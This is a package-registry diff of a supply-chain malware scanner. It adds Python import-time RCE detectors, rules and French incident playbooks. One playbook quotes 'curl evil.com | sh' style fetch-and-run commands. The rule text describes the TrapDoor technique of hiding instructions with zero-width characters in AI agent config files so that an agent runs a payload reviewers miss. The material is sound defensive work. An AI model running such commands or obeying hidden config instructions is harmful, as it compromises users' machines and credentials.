muaddib-scanner 2.11.39 → 2.11.41

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "muaddib-scanner",
3
- "version": "2.11.39",
3
+ "version": "2.11.41",
4
4
  "description": "Supply-chain threat detection & response for npm & PyPI/Python",
5
5
  "main": "src/index.js",
6
6
  "bin": {
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "target": "node_modules",
3
- "timestamp": "2026-05-25T08:33:11.787Z",
3
+ "timestamp": "2026-05-25T10:35:47.158Z",
4
4
  "threats": [
5
5
  {
6
6
  "type": "string_mutation_obfuscation",
@@ -870,6 +870,27 @@
870
870
  "playbook": "CRITIQUE: Execution de commande shell dangereuse detectee. Isoler la machine. Verifier si la commande a ete executee.",
871
871
  "points": 3
872
872
  },
873
+ {
874
+ "type": "unicode_invisible_injection",
875
+ "severity": "CRITICAL",
876
+ "message": "10 invisible Unicode characters detected (zero-width, variation selectors, tag chars). Possible hidden payload encoded via invisible codepoints.",
877
+ "file": "iconv-lite/encodings/sbcs-data-generated.js",
878
+ "count": 1,
879
+ "reductions": [],
880
+ "originalSeverity": "CRITICAL",
881
+ "confidenceTier": "medium",
882
+ "rule_id": "MUADDIB-OBF-003",
883
+ "rule_name": "Unicode Invisible Character Injection",
884
+ "confidence": "high",
885
+ "domain": "malware",
886
+ "references": [
887
+ "https://www.aikido.dev/blog/glassworm-returns-unicode-attack-github-npm-vscode",
888
+ "https://attack.mitre.org/techniques/T1027/"
889
+ ],
890
+ "mitre": "T1027",
891
+ "playbook": "CRITIQUE: Caracteres Unicode invisibles detectes (zero-width, variation selectors). Technique GlassWorm: du code malveillant est encode via des variation selectors invisibles dans les editeurs. Analyser le fichier avec un editeur hexa. Supprimer le package immediatement. Verifier les autres fichiers du projet pour des injections similaires.",
892
+ "points": 25
893
+ },
873
894
  {
874
895
  "type": "high_entropy_string",
875
896
  "severity": "LOW",
@@ -1107,17 +1128,17 @@
1107
1128
  ],
1108
1129
  "python": null,
1109
1130
  "summary": {
1110
- "total": 51,
1111
- "critical": 2,
1131
+ "total": 52,
1132
+ "critical": 3,
1112
1133
  "high": 6,
1113
1134
  "medium": 28,
1114
1135
  "low": 15,
1115
1136
  "riskScore": 35,
1116
1137
  "riskLevel": "MEDIUM",
1117
1138
  "globalRiskScore": 100,
1118
- "maxFileScore": 25,
1139
+ "maxFileScore": 26,
1119
1140
  "packageScore": 1,
1120
- "mostSuspiciousFile": "ajv/lib/ajv.js",
1141
+ "mostSuspiciousFile": "iconv-lite/encodings/sbcs-data-generated.js",
1121
1142
  "fileScores": {
1122
1143
  "esquery/parser.js": 5,
1123
1144
  "ajv/lib/ajv.js": 25,
@@ -1133,7 +1154,7 @@
1133
1154
  "eslint/lib/config/config-loader.js": 11,
1134
1155
  "eslint/lib/eslint/eslint-helpers.js": 25,
1135
1156
  "eslint/lib/eslint/eslint.js": 13,
1136
- "iconv-lite/encodings/sbcs-data-generated.js": 1,
1157
+ "iconv-lite/encodings/sbcs-data-generated.js": 26,
1137
1158
  "iconv-lite/encodings/sbcs-data.js": 1,
1138
1159
  "ajv/lib/compile/formats.js": 1
1139
1160
  },
@@ -1169,6 +1190,12 @@
1169
1190
  "points": 25,
1170
1191
  "reason": "Dynamic import() with computed URL argument — remote code loading from dynamically constructed URL."
1171
1192
  },
1193
+ {
1194
+ "rule": "MUADDIB-OBF-003",
1195
+ "type": "unicode_invisible_injection",
1196
+ "points": 25,
1197
+ "reason": "10 invisible Unicode characters detected (zero-width, variation selectors, tag chars). Possible hidden payload encoded via invisible codepoints."
1198
+ },
1172
1199
  {
1173
1200
  "rule": "MUADDIB-AST-006",
1174
1201
  "type": "dynamic_require",
@@ -1461,7 +1488,7 @@
1461
1488
  "tierCounts": {
1462
1489
  "verified": 0,
1463
1490
  "high": 0,
1464
- "medium": 9,
1491
+ "medium": 10,
1465
1492
  "low": 42
1466
1493
  },
1467
1494
  "perceivedFlagged": 0
@@ -20,6 +20,7 @@ const { deobfuscate } = require('../scanner/deobfuscate.js');
20
20
  const { buildModuleGraph, annotateTaintedExports, detectCrossFileFlows, annotateSinkExports, detectCallbackCrossFileFlows, detectEventEmitterFlows } = require('../scanner/module-graph');
21
21
  const { loadCachedIOCs, checkIOCStaleness } = require('../ioc/updater.js');
22
22
  const { detectPythonProject, normalizePythonName } = require('../scanner/python.js');
23
+ const { scanPythonSource } = require('../scanner/python-source.js');
23
24
  const { Spinner, listInstalledPackages, wasFilesCapped, getOverflowFiles, debugLog } = require('../utils.js');
24
25
  const { getMaxFileSize } = require('../shared/constants.js');
25
26
  const { scanParanoid } = require('../scanner/paranoid.js');
@@ -202,7 +203,7 @@ async function execute(targetPath, options, pythonDeps, warnings) {
202
203
  'scanDependencies', 'scanHashes', 'analyzeDataFlow', 'scanTyposquatting',
203
204
  'scanGitHubActions', 'matchPythonIOCs', 'checkPyPITyposquatting',
204
205
  'scanEntropy', 'scanAIConfig', 'scanIocStrings', 'scanAntiForensic',
205
- 'scanStubPackage', 'scanMonorepo', 'scanTrustedDepDiff'
206
+ 'scanStubPackage', 'scanMonorepo', 'scanTrustedDepDiff', 'scanPythonSource'
206
207
  ];
207
208
 
208
209
  const settledResults = await Promise.allSettled([
@@ -228,7 +229,12 @@ async function execute(targetPath, options, pythonDeps, warnings) {
228
229
  // Wrapped in withTimeout as defense in depth: scanner has its own 10s + 5s × N
229
230
  // internal timeouts, but a registry slowdown with many added deps could exceed
230
231
  // the static-scan budget without this cap.
231
- withTimeout(() => scanTrustedDepDiff(targetPath, options), 'scanTrustedDepDiff')
232
+ withTimeout(() => scanTrustedDepDiff(targetPath, options), 'scanTrustedDepDiff'),
233
+ // PYSRC-001..008 (v2.11.25, TrapDoor PyPI gap). Detect import-time RCE
234
+ // in __init__.py / setup.py / top-level .py files. Runs always — not gated
235
+ // on detectPythonProject() because an attacker can ship a malicious __init__.py
236
+ // without a requirements.txt. Walker is cheap (just a depth-1 readdir).
237
+ yieldThen(() => scanPythonSource(targetPath))
232
238
  ]);
233
239
 
234
240
  // Extract results: use empty array for rejected scanners, log errors
@@ -258,7 +264,8 @@ async function execute(targetPath, options, pythonDeps, warnings) {
258
264
  antiForensicThreats,
259
265
  stubPackageThreats,
260
266
  monorepoThreats,
261
- trustedDepDiffThreats
267
+ trustedDepDiffThreats,
268
+ pythonSourceThreats
262
269
  ] = scanResult;
263
270
 
264
271
  // Emit warning if file count cap was hit + quick-scan overflow files
@@ -339,6 +346,7 @@ async function execute(targetPath, options, pythonDeps, warnings) {
339
346
  ...stubPackageThreats,
340
347
  ...monorepoThreats,
341
348
  ...trustedDepDiffThreats,
349
+ ...pythonSourceThreats,
342
350
  ...crossFileFlows.filter(f => f && f.sourceFile && f.sinkFile).map(f => ({
343
351
  type: f.type,
344
352
  severity: f.severity,
@@ -399,6 +399,69 @@ const PLAYBOOKS = {
399
399
  'Technique Shai-Hulud (TeamPCP). Supprimer les fichiers .claude/settings.json ' +
400
400
  'et .vscode/tasks.json avant ouverture.',
401
401
 
402
+ aiconf_unicode_obfuscation:
403
+ 'CRITIQUE: Fichier de config d\'agent IA contient des caracteres Unicode invisibles ' +
404
+ '(zero-width, directional override, variation selectors). Technique TrapDoor (mai 2026): ' +
405
+ 'l\'attaquant insere des U+200B au milieu de mots-cles pour echapper a la revue humaine ' +
406
+ 'et aux regex statiques, tandis que l\'agent IA (Claude, Cursor) lit le contenu normalise ' +
407
+ 'et execute le payload cache. NE PAS ouvrir ce projet avec un agent IA. Ouvrir le fichier ' +
408
+ 'dans un editeur qui affiche les caracteres invisibles (VS Code: "editor.renderControlCharacters") ' +
409
+ 'pour inspecter le contenu reel. Supprimer le fichier ou nettoyer les caracteres invisibles ' +
410
+ 'avant toute utilisation. Si deja ouvert avec un agent IA, regenerer tous les secrets touches.',
411
+
412
+ import_time_exec:
413
+ 'CRITIQUE: Le fichier Python (__init__.py / setup.py / module top-level) execute exec() ou eval() ' +
414
+ 'a l\'import ou pip install. RCE immediat sur la machine de l\'utilisateur. ' +
415
+ 'NE PAS installer ce package. Si deja installe: pip uninstall immediatement, ' +
416
+ 'auditer les processus en cours, regenerer les credentials potentiellement compromis. ' +
417
+ 'Inspecter le code exec/eval pour identifier le payload reel.',
418
+
419
+ import_time_subprocess:
420
+ 'CRITIQUE: Le fichier Python spawn un processus externe (subprocess.Popen/run/call/check_output) ' +
421
+ 'a l\'import ou pip install. Generalement utilise pour fetch + execute remote payload, ' +
422
+ 'lateral movement, ou installation de persistence. NE PAS installer. Verifier le contenu ' +
423
+ 'de l\'appel pour identifier la commande executee. Auditer les processus enfants si deja installe.',
424
+
425
+ import_time_os_system:
426
+ 'CRITIQUE: Le fichier Python execute des commandes shell (os.system / os.popen / os.spawn / os.exec) ' +
427
+ 'a l\'import ou pip install. Pattern frequent: "curl evil.com | sh" ou "wget evil.com | bash". ' +
428
+ 'NE PAS installer. Inspecter la commande exacte. Si execute: considerer la machine compromise.',
429
+
430
+ import_time_fetch_exec:
431
+ 'CRITIQUE: Pattern TrapDoor detecte. Le fichier Python fetch un payload depuis le reseau ' +
432
+ '(urllib/requests/http.client/httpx/aiohttp) ET execute du code (exec/eval) dans le meme fichier. ' +
433
+ 'C\'est la signature directe d\'une remote-payload-then-RCE. NE PAS installer. ' +
434
+ 'Bloquer le domaine du fetch dans le firewall. Si execute: incident response complet, ' +
435
+ 'regenerer TOUS les secrets sur la machine (SSH, AWS, GitHub, npm, env vars).',
436
+
437
+ import_time_base64_exec:
438
+ 'CRITIQUE: Le fichier Python base64-decode du contenu ET execute (exec/eval) dans le meme fichier. ' +
439
+ 'Pattern d\'obfuscation classique: payload encode pour echapper a la revue + grep statique. ' +
440
+ 'NE PAS installer. Decoder le base64 manuellement pour identifier le payload reel ' +
441
+ '(python3 -c "import base64; print(base64.b64decode(b\'<payload>\').decode())").',
442
+
443
+ import_time_deserialization:
444
+ 'CRITIQUE: Le fichier Python utilise pickle/marshal/dill/cloudpickle .loads() au niveau module. ' +
445
+ 'Ces fonctions sont triviallement RCE si l\'input deserializise vient d\'une source attaquant-controllee ' +
446
+ '(fichier sur disque, requete HTTP, env var). NE PAS installer si l\'origine du blob deserialize ' +
447
+ 'n\'est pas un fichier de donnees interne au package. Si interne: verifier l\'integrite (signature, hash).',
448
+
449
+ dynamic_dangerous_import:
450
+ 'HIGH: Le fichier Python utilise __import__() avec un nom hardcode dangereux ' +
451
+ '(subprocess, os, requests, urllib, socket, http, ssl, ctypes, importlib). ' +
452
+ 'Pattern d\'obfuscation: evite "import X" statique pour bypass les scanners qui ne tracent ' +
453
+ 'que les imports declares. Combinaison avec exec/subprocess/fetch indique malveillance. ' +
454
+ 'Inspecter manuellement les appels suivants au module dynamiquement importe.',
455
+
456
+ python_source_unicode_obfuscation:
457
+ 'CRITIQUE: Fichier Python contient ≥5 caracteres Unicode invisibles ' +
458
+ '(zero-width, directional override, variation selectors, tag characters). ' +
459
+ 'Python rejette les identifiers avec ZW (PEP 3131 SyntaxError), donc le vecteur est ' +
460
+ 'soit (a) obfuscation dans des strings (GlassWorm-style payload encoding via variation selectors), ' +
461
+ 'soit (b) comments avec ZW pour induire en erreur la revue humaine. ' +
462
+ 'NE PAS installer. Ouvrir le fichier dans un editeur affichant les caracteres invisibles ' +
463
+ '(VS Code: "editor.renderControlCharacters") pour inspecter le contenu reel.',
464
+
402
465
  ai_agent_abuse:
403
466
  'CRITIQUE: Un agent IA (Claude, Gemini, Q) est invoque avec des flags de bypass de securite ' +
404
467
  '(--dangerously-skip-permissions, --yolo, --trust-all-tools). Technique s1ngularity/Nx. ' +
@@ -224,6 +224,121 @@ const RULES = {
224
224
  ],
225
225
  mitre: 'T1195.002'
226
226
  },
227
+
228
+ // PYSRC-001 a 008 — Python source scanner (TrapDoor PyPI gap, v2.11.25).
229
+ // python.js est manifest-only ; ast.js/dataflow.js sont JS-only ; ioc-strings.js
230
+ // fait du literal match. Aucun ne couvre l'execution a l'import via __init__.py
231
+ // / setup.py. Ces 8 regles ferment ce gap.
232
+ import_time_exec: {
233
+ id: 'MUADDIB-PYSRC-001',
234
+ name: 'Python Import-Time exec/eval',
235
+ severity: 'CRITICAL',
236
+ confidence: 'high',
237
+ domain: 'malware',
238
+ description: 'Fichier Python (__init__.py, setup.py, top-level *.py) contient exec()/eval() — execution directe de code a l\'import ou a pip install. RCE immediat sur la machine de l\'utilisateur. Pattern central de TrapDoor (mai 2026).',
239
+ references: [
240
+ 'https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates',
241
+ 'https://attack.mitre.org/techniques/T1059/006/'
242
+ ],
243
+ mitre: 'T1059.006'
244
+ },
245
+ import_time_subprocess: {
246
+ id: 'MUADDIB-PYSRC-002',
247
+ name: 'Python Import-Time subprocess',
248
+ severity: 'CRITICAL',
249
+ confidence: 'high',
250
+ domain: 'malware',
251
+ description: 'Fichier Python contient subprocess.Popen/run/call/check_output au niveau module — spawn d\'un processus externe a l\'import ou pip install. Utilise pour fetch + execute remote payload ou pour latteral movement.',
252
+ references: [
253
+ 'https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates',
254
+ 'https://attack.mitre.org/techniques/T1059/006/'
255
+ ],
256
+ mitre: 'T1059.006'
257
+ },
258
+ import_time_os_system: {
259
+ id: 'MUADDIB-PYSRC-003',
260
+ name: 'Python Import-Time os.system / os.popen / os.spawn / os.exec',
261
+ severity: 'CRITICAL',
262
+ confidence: 'high',
263
+ domain: 'malware',
264
+ description: 'Fichier Python contient os.system(), os.popen(), os.spawn*() ou os.exec*() au niveau module — shell execution a l\'import ou pip install. Generalement utilise pour curl|sh ou wget|bash remote payload.',
265
+ references: [
266
+ 'https://attack.mitre.org/techniques/T1059/006/',
267
+ 'https://attack.mitre.org/techniques/T1059/004/'
268
+ ],
269
+ mitre: 'T1059.006'
270
+ },
271
+ import_time_fetch_exec: {
272
+ id: 'MUADDIB-PYSRC-004',
273
+ name: 'Python Import-Time Fetch + Exec (TrapDoor pattern)',
274
+ severity: 'CRITICAL',
275
+ confidence: 'high',
276
+ domain: 'malware',
277
+ description: 'Compound detection : le meme fichier Python contient (urllib.request / requests / http.client / httpx / aiohttp) ET exec()/eval(). Signature directe de TrapDoor : telecharge un payload depuis le C2 et l\'execute. Implique RCE + capacite C2 active.',
278
+ references: [
279
+ 'https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates',
280
+ 'https://attack.mitre.org/techniques/T1105/',
281
+ 'https://attack.mitre.org/techniques/T1059/006/'
282
+ ],
283
+ mitre: 'T1105'
284
+ },
285
+ import_time_base64_exec: {
286
+ id: 'MUADDIB-PYSRC-005',
287
+ name: 'Python Import-Time Base64 Decode + Exec',
288
+ severity: 'CRITICAL',
289
+ confidence: 'high',
290
+ domain: 'malware',
291
+ description: 'Compound detection : le meme fichier Python contient base64.b64decode / codecs.decode ET exec()/eval(). Pattern d\'obfuscation classique : payload encode en base64 (parfois chaine multiple) puis execute. Vu dans Lazarus PyPI campaigns + TrapDoor.',
292
+ references: [
293
+ 'https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates',
294
+ 'https://attack.mitre.org/techniques/T1027/',
295
+ 'https://attack.mitre.org/techniques/T1059/006/'
296
+ ],
297
+ mitre: 'T1027'
298
+ },
299
+ import_time_deserialization: {
300
+ id: 'MUADDIB-PYSRC-006',
301
+ name: 'Python Import-Time Unsafe Deserialization',
302
+ severity: 'CRITICAL',
303
+ confidence: 'high',
304
+ domain: 'vulnerability',
305
+ description: 'Fichier Python utilise pickle/cPickle/marshal/dill/cloudpickle/jsonpickle/shelve .loads() au niveau module. Ces fonctions sont trivialement RCE si l\'input est attaquant-controle (deserialization = code execution). Risque critique meme sans malveillance prouvee.',
306
+ references: [
307
+ 'https://docs.python.org/3/library/pickle.html#restricting-globals',
308
+ 'https://attack.mitre.org/techniques/T1059/006/',
309
+ 'https://cwe.mitre.org/data/definitions/502.html'
310
+ ],
311
+ mitre: 'T1059.006'
312
+ },
313
+ dynamic_dangerous_import: {
314
+ id: 'MUADDIB-PYSRC-007',
315
+ name: 'Python Dynamic __import__ of Dangerous Module',
316
+ severity: 'HIGH',
317
+ confidence: 'medium',
318
+ domain: 'malware',
319
+ description: 'Fichier Python utilise __import__() avec un nom hardcode dangereux (subprocess, os, requests, urllib, socket, http, ssl, ctypes, importlib). Pattern d\'obfuscation : evite l\'instruction "import X" statique pour echapper aux scanners qui ne tracent que les imports declares.',
320
+ references: [
321
+ 'https://attack.mitre.org/techniques/T1027/',
322
+ 'https://docs.python.org/3/library/functions.html#import__'
323
+ ],
324
+ mitre: 'T1027'
325
+ },
326
+ python_source_unicode_obfuscation: {
327
+ id: 'MUADDIB-PYSRC-008',
328
+ name: 'Python Source Unicode Obfuscation',
329
+ severity: 'CRITICAL',
330
+ confidence: 'high',
331
+ domain: 'malware',
332
+ description: 'Fichier Python contient ≥5 caracteres Unicode invisibles (zero-width, directional override, variation selectors, tag characters). Mirror de AICONF-004 pour les sources .py. Python rejette les identifiers avec ZW chars (SyntaxError, PEP 3131), donc le vecteur principal c\'est l\'obfuscation dans les strings (GlassWorm-style payload encoding) ou dans les comments (mislead human review).',
333
+ references: [
334
+ 'https://www.aikido.dev/blog/glassworm-returns-unicode-attack-github-npm-vscode',
335
+ 'https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates',
336
+ 'https://trojansource.codes/',
337
+ 'https://attack.mitre.org/techniques/T1027/'
338
+ ],
339
+ mitre: 'T1027.013'
340
+ },
341
+
227
342
  suspicious_file: {
228
343
  id: 'MUADDIB-DEP-002',
229
344
  name: 'Suspicious File in Dependency',
@@ -914,6 +1029,21 @@ const RULES = {
914
1029
  ],
915
1030
  mitre: 'T1546'
916
1031
  },
1032
+ aiconf_unicode_obfuscation: {
1033
+ id: 'MUADDIB-AICONF-004',
1034
+ name: 'Zero-Width Unicode Obfuscation in AI Config',
1035
+ severity: 'CRITICAL',
1036
+ confidence: 'high',
1037
+ domain: 'malware',
1038
+ description: 'Fichier de configuration d\'agent IA (.cursorrules, CLAUDE.md, copilot-instructions.md) contient des caracteres Unicode invisibles (zero-width, directional override, variation selectors) qui cachent des instructions a la revue humaine ou cassent des mots-cles pour echapper a la detection regex. Technique TrapDoor (mai 2026): cu​rl|sh interspersee de U+200B passe au travers du regex /curl/ tandis que l\'agent IA execute le payload normalise.',
1039
+ references: [
1040
+ 'https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates',
1041
+ 'https://www.aikido.dev/blog/glassworm-returns-unicode-attack-github-npm-vscode',
1042
+ 'https://trojansource.codes/',
1043
+ 'https://attack.mitre.org/techniques/T1027/'
1044
+ ],
1045
+ mitre: 'T1027.013'
1046
+ },
917
1047
 
918
1048
  require_cache_poison: {
919
1049
  id: 'MUADDIB-AST-019',
@@ -18,6 +18,14 @@
18
18
 
19
19
  const fs = require('fs');
20
20
  const path = require('path');
21
+ const { countInvisibleUnicode, stripInvisibleUnicode } = require('../shared/unicode-invisibles.js');
22
+
23
+ // Threshold above which an AI config file is flagged as ZW-Unicode-obfuscated.
24
+ // Lower than obfuscation.js (10) because .cursorrules / CLAUDE.md should never
25
+ // legitimately contain invisible codepoints — even international content uses
26
+ // only visible chars (CJK, accents, emoji with U+FE0F variation selector are
27
+ // NOT counted by countInvisibleUnicode).
28
+ const AI_CONFIG_ZW_THRESHOLD = 5;
21
29
 
22
30
  // AI agent config files to scan for prompt injection (relative to project root)
23
31
  const AI_CONFIG_FILES = [
@@ -111,7 +119,12 @@ function scanAIConfig(targetPath) {
111
119
  }
112
120
 
113
121
  const relPath = configFile;
114
- const fileThreats = analyzeAIConfigFile(content, relPath);
122
+ // Normalize invisible Unicode BEFORE running regex patterns.
123
+ // Without this, an attacker can split keywords with U+200B (`cu​rl`) to
124
+ // evade /curl\s+/ — the exact TrapDoor (mai 2026) .cursorrules vector.
125
+ const invisibleCount = countInvisibleUnicode(content);
126
+ const normalized = invisibleCount > 0 ? stripInvisibleUnicode(content) : content;
127
+ const fileThreats = analyzeAIConfigFile(normalized, relPath, invisibleCount);
115
128
  threats.push(...fileThreats);
116
129
  }
117
130
 
@@ -218,14 +231,30 @@ function analyzeIDEHookFile(content, relPath) {
218
231
  }
219
232
 
220
233
  /**
221
- * Analyze a single AI config file for prompt injection patterns
234
+ * Analyze a single AI config file for prompt injection patterns.
235
+ *
236
+ * @param {string} content - File content, already normalized (invisible Unicode stripped).
237
+ * @param {string} relPath - Relative path of the config file.
238
+ * @param {number} invisibleCount - Number of invisible Unicode codepoints in the original (pre-strip) content.
222
239
  */
223
- function analyzeAIConfigFile(content, relPath) {
240
+ function analyzeAIConfigFile(content, relPath, invisibleCount) {
224
241
  const threats = [];
225
242
  let hasShellCommand = false;
226
243
  let hasExfiltration = false;
227
244
  let hasCredentialAccess = false;
228
245
 
246
+ // Zero-width / directional Unicode obfuscation (TrapDoor, mai 2026).
247
+ // An attacker can hide instructions or split keywords with U+200B etc. so
248
+ // human reviewers see "harmless" text while the AI agent reads the payload.
249
+ if (invisibleCount >= AI_CONFIG_ZW_THRESHOLD) {
250
+ threats.push({
251
+ type: 'aiconf_unicode_obfuscation',
252
+ severity: 'CRITICAL',
253
+ message: `AI config contains ${invisibleCount} invisible Unicode characters (zero-width / directional / variation selectors) in ${relPath} — content was normalized before pattern matching. Possible hidden instructions or keyword-splitting evasion (TrapDoor pattern).`,
254
+ file: relPath
255
+ });
256
+ }
257
+
229
258
  // Check shell command patterns
230
259
  for (const pattern of SHELL_COMMAND_PATTERNS) {
231
260
  if (pattern.regex.test(content)) {
@@ -1,6 +1,7 @@
1
1
  const fs = require('fs');
2
2
  const path = require('path');
3
3
  const { findFiles, forEachSafeFile, debugLog } = require('../utils.js');
4
+ const { countInvisibleUnicode } = require('../shared/unicode-invisibles.js');
4
5
 
5
6
  // node_modules NOT excluded: detect obfuscated code in dependencies.
6
7
  // dist/build/out/output excluded: bundled output is always flagged as isPackageOutput (LOW)
@@ -198,52 +199,4 @@ function hasLargeStringArray(content) {
198
199
  return false;
199
200
  }
200
201
 
201
- /**
202
- * Count invisible Unicode codepoints in content (GlassWorm detection).
203
- * Covers BMP zero-width chars, variation selectors, and supplementary plane
204
- * tag characters / variation selectors supplement via codePointAt iteration.
205
- *
206
- * Codepoints detected:
207
- * - U+200B, U+200C, U+200D (zero-width space/joiner/non-joiner)
208
- * - U+FEFF (BOM — only if position > 0; pos 0 is legitimate BOM)
209
- * - U+2060 (word joiner), U+180E (Mongolian vowel separator)
210
- * - U+FE00-U+FE0E (variation selectors — excludes U+FE0F emoji presentation selector)
211
- * - U+E0100-U+E01EF (variation selectors supplement)
212
- * - U+E0001-U+E007F (tag characters)
213
- */
214
- function countInvisibleUnicode(content) {
215
- let count = 0;
216
- for (let i = 0; i < content.length; i++) {
217
- const cp = content.codePointAt(i);
218
- // BMP invisible chars
219
- if (cp === 0x200B || cp === 0x200C || cp === 0x200D ||
220
- cp === 0x2060 || cp === 0x180E) {
221
- count++;
222
- }
223
- // BOM only suspicious after position 0
224
- else if (cp === 0xFEFF && i > 0) {
225
- count++;
226
- }
227
- // BMP variation selectors (U+FE00-U+FE0E) — excludes U+FE0F (emoji presentation selector)
228
- else if (cp >= 0xFE00 && cp <= 0xFE0E) {
229
- count++;
230
- }
231
- // Supplementary plane: variation selectors supplement (U+E0100-U+E01EF)
232
- else if (cp >= 0xE0100 && cp <= 0xE01EF) {
233
- count++;
234
- i++; // skip surrogate pair low half
235
- }
236
- // Supplementary plane: tag characters (U+E0001-U+E007F)
237
- else if (cp >= 0xE0001 && cp <= 0xE007F) {
238
- count++;
239
- i++; // skip surrogate pair low half
240
- }
241
- // Skip surrogate pair low half for other supplementary chars
242
- else if (cp > 0xFFFF) {
243
- i++;
244
- }
245
- }
246
- return count;
247
- }
248
-
249
202
  module.exports = { detectObfuscation };
@@ -0,0 +1,319 @@
1
+ 'use strict';
2
+
3
+ /**
4
+ * Python Source Scanner — detects import-time / install-time RCE patterns.
5
+ *
6
+ * Created v2.11.25 (TrapDoor PyPI gap, mai 2026). `python.js` is a manifest
7
+ * parser (requirements.txt, setup.py, pyproject.toml — extracts dep names) ;
8
+ * it never reads package source. `ast.js` / `dataflow.js` use acorn (JS only)
9
+ * and skip `.py`. Only `ioc-strings.js` opens `.py` files, just for literal
10
+ * IOC matching. → A malicious `__init__.py` that fetches + execs a payload at
11
+ * import time was invisible to MUAD'DIB. This scanner closes that gap.
12
+ *
13
+ * Pas d'AST Python (CLAUDE.md interdit les deps runtime hors acorn / js-yaml /
14
+ * adm-zip / @inquirer/prompts). Détection par regex ciblées sur les API
15
+ * dangereuses, avec préprocessing :
16
+ * - strip des full-line comments (`^\s*#.*$`)
17
+ * - strip des triple-quoted strings (docstrings, block strings — réduit les
18
+ * FPs sur les docs qui mentionnent `exec`)
19
+ * - strip des chars Unicode invisibles via le helper partagé (mirror du fix
20
+ * AICONF-004 : empêche `e<ZWSP>xec(` de bypass — bien que Python rejette
21
+ * cet identifier comme SyntaxError, des invisibles dans des strings/comments
22
+ * restent un signal d'obfuscation valide).
23
+ *
24
+ * Rules : PYSRC-001 à PYSRC-008. Voir src/rules/index.js pour le détail.
25
+ *
26
+ * Références :
27
+ * - https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates (mai 2026)
28
+ * - https://attack.mitre.org/techniques/T1059/006/ (Command Scripting Interpreter: Python)
29
+ */
30
+
31
+ const fs = require('fs');
32
+ const path = require('path');
33
+ const { countInvisibleUnicode, stripInvisibleUnicode } = require('../shared/unicode-invisibles.js');
34
+
35
+ const MAX_FILE_SIZE = 1024 * 1024; // 1 MB cap, cohérent avec ai-config.js
36
+
37
+ const PYSRC_UNICODE_THRESHOLD = 5;
38
+
39
+ // Dirs to skip when looking for __init__.py at depth-1. Couvre les patterns
40
+ // classiques (virtualenv, caches, tests, docs, build artifacts).
41
+ const EXCLUDED_DIRS = new Set([
42
+ 'tests', 'test', '__pycache__', '.pytest_cache', '.tox', '.nox',
43
+ '.venv', 'venv', 'env', '.env',
44
+ '.git', '.hg', '.svn',
45
+ 'node_modules',
46
+ 'examples', 'example', 'sample', 'samples',
47
+ 'docs', 'doc',
48
+ 'build', 'dist', 'site-packages',
49
+ '.mypy_cache', '.ruff_cache', '.pytype', '.pyre',
50
+ '.muaddib-cache', '.idea', '.vscode'
51
+ ]);
52
+
53
+ // Files explicitly targeted at root (always scanned if present).
54
+ const ROOT_TARGET_FILES = ['__init__.py', 'setup.py'];
55
+
56
/**
 * Collect the Python files under `targetPath` that this scanner inspects:
 *   - every regular file at the root whose name ends in `.py` (this includes
 *     the names listed in ROOT_TARGET_FILES);
 *   - `<dir>/__init__.py` for each non-excluded, non-hidden root directory;
 *   - `src/<dir>/__init__.py` for each non-excluded, non-hidden directory
 *     directly under a root-level `src` directory (src-layout projects).
 *
 * Any filesystem error (unreadable directory, vanished entry) is treated as
 * "nothing here" rather than propagated.
 *
 * @param {string} targetPath - Directory to inspect.
 * @returns {string[]} Paths built with path.join(targetPath, ...), without
 *   duplicates, in discovery order.
 */
function findTargetPythonFiles(targetPath) {
  let rootNames;
  try {
    rootNames = fs.readdirSync(targetPath);
  } catch {
    return [];
  }

  const found = new Set();

  // stat() the candidate and apply the predicate; any stat failure counts as "no".
  const statMatches = (candidate, predicate) => {
    try {
      return predicate(fs.statSync(candidate));
    } catch {
      return false;
    }
  };
  const isFile = (candidate) => statMatches(candidate, (info) => info.isFile());
  const isDirectory = (candidate) => statMatches(candidate, (info) => info.isDirectory());

  // Record <dir>/__init__.py when it exists as a regular file.
  const addPackageInit = (dir) => {
    const initPath = path.join(dir, '__init__.py');
    if (isFile(initPath)) found.add(initPath);
  };

  // Pass 1: root-level Python files (single-module packages, setup.py, ...).
  rootNames
    .filter((name) => name.endsWith('.py') || ROOT_TARGET_FILES.includes(name))
    .map((name) => path.join(targetPath, name))
    .filter((candidate) => isFile(candidate))
    .forEach((filePath) => found.add(filePath));

  // Pass 2: package directories one level down, plus the children of `src`.
  for (const name of rootNames) {
    const skipped = EXCLUDED_DIRS.has(name) || (name.startsWith('.') && name !== '.');
    if (skipped) continue;

    const dir = path.join(targetPath, name);
    if (!isDirectory(dir)) continue;

    addPackageInit(dir);
    if (name !== 'src') continue;

    let innerNames;
    try {
      innerNames = fs.readdirSync(dir);
    } catch {
      continue;
    }
    for (const inner of innerNames) {
      if (EXCLUDED_DIRS.has(inner) || inner.startsWith('.')) continue;
      const innerDir = path.join(dir, inner);
      if (isDirectory(innerDir)) addPackageInit(innerDir);
    }
  }

  return [...found];
}
118
+
119
/**
 * Blank out full-line Python comments (lines whose first non-whitespace
 * character is `#`). Inline trailing comments are left in place, since
 * removing them safely would need a real tokenizer.
 *
 * Lines are split on every terminator the Python tokenizer accepts: LF, CRLF
 * and bare CR. Splitting on LF alone would make a file written with CR-only
 * line endings look like one physical line; if that line began with `#`
 * (a shebang, for example) the whole file would be blanked and every later
 * detector would see nothing.
 *
 * @param {string} content - Python source text.
 * @returns {string} The same text with comment-only lines emptied and all
 *   line terminators normalized to `\n`.
 */
function stripPythonComments(content) {
  return content
    .split(/\r\n|\r|\n/)
    .map((line) => (line.trimStart().startsWith('#') ? '' : line))
    .join('\n');
}
133
+
134
/**
 * Replace triple-quoted strings (`"""..."""` and `'''...'''`) with an empty
 * string literal of the same quote character. These are typically docstrings
 * or block strings whose free-form text may mention `exec` or `subprocess`
 * without being a call site. Ordinary single-line strings are preserved (an
 * attacker often hides the payload inside `exec("import os; ...")`).
 *
 * The source is walked once, left to right, recognising triple-quoted
